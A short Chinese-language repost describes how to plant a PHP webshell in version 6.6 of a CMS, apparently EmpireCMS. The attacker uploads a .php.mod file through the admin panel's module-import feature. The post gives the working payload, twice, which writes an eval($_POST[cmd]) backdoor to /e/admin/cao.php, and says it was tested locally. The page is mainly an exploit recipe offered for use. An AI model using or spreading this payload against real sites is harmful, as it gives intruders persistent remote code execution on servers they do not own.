您好,登錄后才能下訂單哦!
見http://www.wooyun.org/bugs/wooyun-2010-03787
以前6.5的有人發的方法是,(進入后臺---系統設置---管理數據表---管理系統模型---導入新型模塊,直接把修改過的php的shell改名為shell.php.mod上傳,新版使用uploadm~num.php來遞增數字)發現6.6不行,上傳之后會變成類似uploadm1324885505nXmTdQamQq.php這樣的!
換了個辦法其實也很簡單<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?> 保存為1.php.mod 然后還是進入后臺---系統設置---管理數據表---管理系統模型---導入新型模塊,上傳之后馬兒就躺在了/e/admin/cao.php了
本地6.6測試通過
<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?>
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。